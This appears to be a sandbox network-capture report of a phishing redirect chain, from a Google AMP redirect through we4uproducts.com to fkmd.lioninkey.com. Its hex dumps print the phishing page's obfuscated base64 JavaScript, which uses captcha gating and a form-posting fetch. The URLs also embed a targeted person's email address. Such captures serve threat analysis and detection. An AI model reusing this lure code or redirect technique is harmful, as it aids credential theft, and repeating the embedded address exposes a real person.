                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:33.708398104 CEST504OUTGET /cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: we4uproducts.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.529115915 CEST264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:33 GMT
                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                      refresh: 0;url=https://FkmD.lioninkey.com/6ysw/#Xjordan.black@learfield.com
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.1649702142.250.186.1314436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:41 UTC1064OUTGET /url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.co.uk
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:41 UTC1075INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Location: https://www.google.co.uk/amp/we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-p5zw71kGIgPmA2epw5Dv1g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:41 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      Content-Length: 316
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      Set-Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs; expires=Fri, 25-Apr-2025 22:05:41 GMT; path=/; domain=.google.co.uk; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:41 UTC303INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 61 6d 70 2f 77 65 34 75 70 72 6f 64 75 63 74 73 2e 63 6f 6d 2f 63 62 62 2f 6c 6c 64 2f 6a 6a 67 2f 35 42 56 76 6e 49 37 63 66 4a 34 48 66 75 68 57 5a 76 56 64 61 37 64 4b 2f 61 6d 39 79
                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.uk/amp/we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9y
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:41 UTC13INData Raw: 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ODY></HTML>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.1649703142.250.186.1314436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:41 UTC1119OUTGET /amp/we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.co.uk
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: NID=518=tbZltSS-ulb9hDMV483oGfGLzq9j5eQ_Lz3xgGuo2HplK-9dWyUDX1UAgdkKhCqBLJ1JA0oEqNH7LE4HyA9XgAkADuoouDlbt5_7NR1zyqwYe9ITMZcbLxWJLd-qEkGXL_VzCHNnLRCkcObT51Q8AEsNfdJaKLuwuwpafH4F64woDjeaOjneF7P-R3nQkMs
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:42 UTC866INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Location: http://we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                      X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-yXUB331feX_S1uyc_Al_9A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:42 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      Content-Length: 294
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:42 UTC294INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 65 34 75 70 72 6f 64 75 63 74 73 2e 63 6f 6d 2f 63 62 62 2f 6c 6c 64 2f 6a 6a 67 2f 35 42 56 76 6e 49 37 63 66 4a 34 48 66 75 68 57 5a 76 56 64 61 37 64 4b 2f 61 6d 39 79 5a 47 46 75 4c 6d 4a 73 59 57 4e 72 51 47 78 6c 59 58 4a 6d 61 57
                                                                                                                                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaW


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      2192.168.2.1649712188.114.96.34436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:44 UTC687OUTGET /6ysw/ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                      Referer: http://we4uproducts.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yIZyQejXMNiXWu3YSPIfL4nQJ1OZJw%2BIDpdDzxTqS1xz42darhbmgpaf%2Br0wVv95vHGZud%2B4WrMRB7db%2BjoCbDXfqdSSyiVjYB8VdirCUrht5KZbmnJD12laDqh3tA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=38175&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1598&delivery_rate=75863&cwnd=251&unsent_bytes=0&cid=331bf4d01629fd2b&ts=163&x=0"
                                                                                                                                                                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InJhYXArdXlCalZsZlhTd1N4eTNUOFE9PSIsInZhbHVlIjoicnlzNFNWN2RKRks0cHAvcHg0aVBBK2ZncnZBdzBKU09yeG5SVm0rZFc5ejJ0eVdBbEFjdFpjUWZXNCtVOWFOZ2ZURVB6OFlhdUVEcW5tdkhlUFVub2ptWDloYXM0ZGlVOVhOUFVUTWZSY1FublBMZndIK0NNdnNWMGZEQ2ZoQTMiLCJtYWMiOiI2ZWY3NjJlZWI3OTA2ZWViMGMyNTRjODE3MDIzOTYyNzQzMzgyNmEzMjcxY2ZhOTA5NTljNDEyNjY4ZDgxM2QyIiwidGFnIjoiIn0%3D; expires=Fri, 25-Oct-2024 00:05:44 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 4d 79 52 45 70 6b 4d 46 56 50 54 57 52 31 61 45 49 33 62 55 5a 53 4d 6e 63 30 4e 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 32 31 35 55 46 70 75 59 7a 68 48 63 30 35 4b 5a 31 46 5a 54 57 4e 4b 4d 55 35 59 4e 31 64 4e 4c 32 74 57 62 31 64 58 63 6d 4e 61 61 6c 4a 4b 63 6b 70 44 63 79 73 32 4d 55 35 33 53 56 5a 69 5a 6d 56 52 65 6e 67 77 51 6d 4e 47 61 56 56 59 57 6d 63 35 62 57 45 72 51 55 70 6b 54 33 51 77 56 6a 6c 61 4d 6b 56 70 4e 55 78 48 62 57 31 42 59 6e 52 30 64 48 70 6a 54 56 6c 43 57 55 64 45 63 43 39 6e 56 6a 41 35 55 43 74 43 53 57 56 6f 54 55 5a 53 4e 47 55 78 64 6e 4a 35 4c 7a 52 7a 54 30 67 31 52 47 35 76 61 6b 73
                                                                                                                                                                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkMyREpkMFVPTWR1aEI3bUZSMnc0NXc9PSIsInZhbHVlIjoiN215UFpuYzhHc05KZ1FZTWNKMU5YN1dNL2tWb1dXcmNaalJKckpDcys2MU53SVZiZmVRengwQmNGaVVYWmc5bWErQUpkT3QwVjlaMkVpNUxHbW1BYnR0dHpjTVlCWUdEcC9nVjA5UCtCSWVoTUZSNGUxdnJ5LzRzT0g1RG5vaks
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 34 33 38 30 0d 0a 3c 21 2d 2d 20 54 68 65 20 6f 6e 6c 79 20 6c 69 6d 69 74 20 74 6f 20 6f 75 72 20 72 65 61 6c 69 7a 61 74 69 6f 6e 20 6f 66 20 74 6f 6d 6f 72 72 6f 77 20 77 69 6c 6c 20 62 65 20 6f 75 72 20 64 6f 75 62 74 73 20 6f 66 20 74 6f 64 61 79 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 47 61 32 31 45 4c 6d 78 70 62 32 35 70 62 6d 74 6c 65 53 35 6a 62 32 30 76 4e 6e 6c 7a 64 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42
                                                                                                                                                                                                                                                                                      Data Ascii: 4380... The only limit to our realization of tomorrow will be our doubts of today. --><script>if(atob("aHR0cHM6Ly9Ga21ELmxpb25pbmtleS5jb20vNnlzdy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCB
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 35 69 51 32 6c 59 64 6e 56 74 55 6c 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 5a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75
                                                                                                                                                                                                                                                                                      Data Ascii: jFyZW07fQ0KI05iQ2lYdnVtUlQuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2lu
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 42 68 63 6d 6c 68 62 43 77 67 63 32 46 75 63 79 31 7a 5a 58 4a 70 5a 6a 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 32 4e 76 62 47 39 79 4f 69 41 6a 4d 44 41 77 4f 33 42 68 5a 47 52 70 62 6d 63 36 49 44 49 77 63 48 67 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4f 48 42 34 4f 32 39 32 5a 58 4a 7a 59 33 4a 76 62 47 77 74 59 6d 56 6f 59 58 5a 70 62 33 49 36 49 47 4e 76 62 6e 52 68 61 57 34 37 49 6a 34 4e 43 6a 78 6b 61 58 59 67 61 57 51 39 49 6b 35 69 51 32 6c 59 64 6e 56 74 55 6c 51 69 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 6c 6b 50 53 4a 48 56 30 64 6f 52 58 4a 4b 63 46 5a 72 49 69 42 6a 62 47 46 7a 63
                                                                                                                                                                                                                                                                                      Data Ascii: BhcmlhbCwgc2Fucy1zZXJpZjtiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmO2NvbG9yOiAjMDAwO3BhZGRpbmc6IDIwcHg7Zm9udC1zaXplOiAxOHB4O292ZXJzY3JvbGwtYmVoYXZpb3I6IGNvbnRhaW47Ij4NCjxkaXYgaWQ9Ik5iQ2lYdnVtUlQiIGNsYXNzPSJjYXB0Y2hhLWNvbnRhaW5lciI+DQo8ZGl2IGlkPSJHV0doRXJKcFZrIiBjbGFzc
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 30 64 57 35 70 64 47 6c 6c 63 79 42 6b 62 32 34 6d 49 7a 41 7a 4f 54 74 30 49 47 68 68 63 48 42 6c 62 69 77 67 65 57 39 31 49 47 4e 79 5a 57 46 30 5a 53 42 30 61 47 56 74 4c 69 41 74 4c 54 34 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 49 53 30 74 49 46 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 62 6d 39 30 49 48 52 6f 5a 53 42 72 5a 58 6b 67 64 47 38 67 61 47 46 77 63 47 6c 75 5a 58 4e 7a 4c 69 42 49 59 58 42 77 61 57 35 6c 63 33 4d 67 61 58 4d 67 64 47 68 6c 49 47 74 6c 65 53 42 30 62 79 42 7a 64 57 4e 6a 5a 58 4e 7a 4c 69 41 74 4c 54 34 4b 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 6e 52 31 63 6d 35 7a 64 47 6c 73 5a 53 35 79 5a 57
                                                                                                                                                                                                                                                                                      Data Ascii: 0dW5pdGllcyBkb24mIzAzOTt0IGhhcHBlbiwgeW91IGNyZWF0ZSB0aGVtLiAtLT4KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8IS0tIFN1Y2Nlc3MgaXMgbm90IHRoZSBrZXkgdG8gaGFwcGluZXNzLiBIYXBwaW5lc3MgaXMgdGhlIGtleSB0byBzdWNjZXNzLiAtLT4KPHNjcmlwdD4NCnR1cm5zdGlsZS5yZW
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 51 6e 46 71 62 6b 4e 59 54 58 42 42 55 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41
                                                                                                                                                                                                                                                                                      Data Ascii: ICAgICBib2R5OiBuZXcgRm9ybURhdGEoQnFqbkNYTXBBUCkNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiA
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 59 73 6d 6e 6b 7a 20 3f 20 55 63 6f 76 46 53 56 47 47 4e 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 55 63 6f 76 46 53 56 47 47 4e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 41 6c 65 4e 47 68 55 49 64 66 20 3d 3d 20 54 48 51 56 59 73 6d 6e 6b 7a 29 7b 0d 0a 63 6f 6e 73 74 20 59 65 74 51 58 76 44 78 4b 78 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 55 63 6f 76 46 53 56 47 47 4e 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 55 63 6f 76 46 53 56 47 47 4e 2e 70 61 74 68 6e 61 6d
                                                                                                                                                                                                                                                                                      Data Ascii: Ysmnkz ? UcovFSVGGN.hostname : UcovFSVGGN.hostname.split('.').slice(-2).join('.');if(AleNGhUIdf == THQVYsmnkz){const YetQXvDxKx = window.location.pathname.split('%23')[0].split('%3F')[0];if (UcovFSVGGN.pathname.endsWith('/')) {UcovFSVGGN.pathnam
